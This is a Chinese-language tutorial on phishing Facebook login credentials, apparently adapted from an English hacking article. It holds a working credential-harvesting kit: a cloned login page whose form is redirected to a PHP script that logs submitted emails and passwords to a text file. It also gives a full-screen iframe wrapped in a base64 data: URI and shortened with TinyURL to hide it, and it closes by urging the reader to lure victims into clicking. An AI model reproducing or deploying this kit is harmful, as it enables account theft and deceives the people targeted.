如何利用iframe URI釣魚
本文以盜取facebook登陸帳號的釣魚為例,來示例如何釣魚攻擊的基本步驟。過程很簡單,主要包括兩個步驟,制作釣魚頁面,與釣魚URI,其他網(wǎng)站的釣魚頁面也可以采取相似的方法,剛接觸釣魚的可以看看。
一、制作釣魚頁面
以盜取facebook登陸帳號的釣魚為例,一共包含三個文件,index.html,login.php,password.txt
第一步:制作index.html登陸頁面
首先,打開 https://www.facebook.com頁面,查看源碼,將源碼copy到index.html文件中。
然后,編輯index.html文件,找到
<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &&
Event.__inlineSubmit && Event.__inlineSubmit(this,event)">
將action的值改為
action=login.php?"https://www.facebook.com/login.php?login_attempt=1"
(login.php是用來盜取登陸帳號密碼的)
將index.html放到web目錄下(我的放置在/Library/WebServer/Documents/facebook目錄下)
第二步:制作盜取facebook帳戶和密碼的腳本login.php
<?php header ('Location: https://www.facebook.com ');//跳轉(zhuǎn)到真實的facebook頁面 $handle = fopen("password.txt", "a");//將假頁面中提交的POST數(shù)據(jù)寫入password.txt文件中foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n");} fwrite($handle, "===============\r\n"); fclose($handle);exit;?>
第三步:創(chuàng)建接收POST數(shù)據(jù)的password.txt文件
dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebook
dani-2:facebook leedani$ sudo touch password.txt
dani-2:facebook leedani$ sudo chmod a+w password.txt
第四步:測試
登陸http://localhost/facebook/
輸入電子郵件與密碼,點擊登陸
查看password.txt文件
dani-2:facebook leedani$ cat password.txt
看,email與pass字段就是facebook的登陸帳號與密碼。
二、制作釣魚URI
一般釣魚會采用iframe用釣魚頁面遮蓋原始頁面的方式來進(jìn)行釣魚,接下來的操作就是生成一個有這個功能的Data: URI,并將這個URI進(jìn)行短地址轉(zhuǎn)換
第一步:生成攻擊代碼
src就是你存放釣魚網(wǎng)頁的地址
<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe
第二步:將攻擊代碼轉(zhuǎn)換為data: URI
登陸http://dopiaza.org/tools/datauri/index.php,將上面代碼粘貼進(jìn)去,
對應(yīng)的data: URI
data:text/plain;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+
將上面的data: URI中的data:text/plain改成data:text/html
data:text/html;charset=utf-8;base64,PHN0eWxlPiBib2R5IHttYXJnaW46MDsgb3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPg0KPGlmcmFtZSBzcmM9Imh0dHA6Ly9sb2NhbGhvc3QvZmFjZWJvb2svIiBoZWlnaHQ9IjEwMCUiIHdpZHRoPSIxMDAlIiBib3JkZXI9Im5vIiBmcmFtZUJvcmRlcj0iMCIgc2Nyb2xsaW5nPSJhdXRvIj5pRnJhbWUgRmFpbGVkPC9pZnJhbWU+
訪問修改后的Data URI,我們可以看到
點擊facebook圖標(biāo),或下面的url鏈接(瀏覽facebook.com),將跳轉(zhuǎn)到我們在第一步中創(chuàng)建的facebook的假登陸頁面 http://localhost/facebook/。
第三步:生成data: URI對應(yīng)的短地址
很顯然,這個URI太長了,會引起懷疑,在真實環(huán)境下,我們可以先進(jìn)行短網(wǎng)址轉(zhuǎn)換,例如http://tinyurl.com/就提供這個服務(wù)
最后,引誘受害者點擊這個會連接到釣魚網(wǎng)頁的URI就可以盜取帳號密碼了。
參考:http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/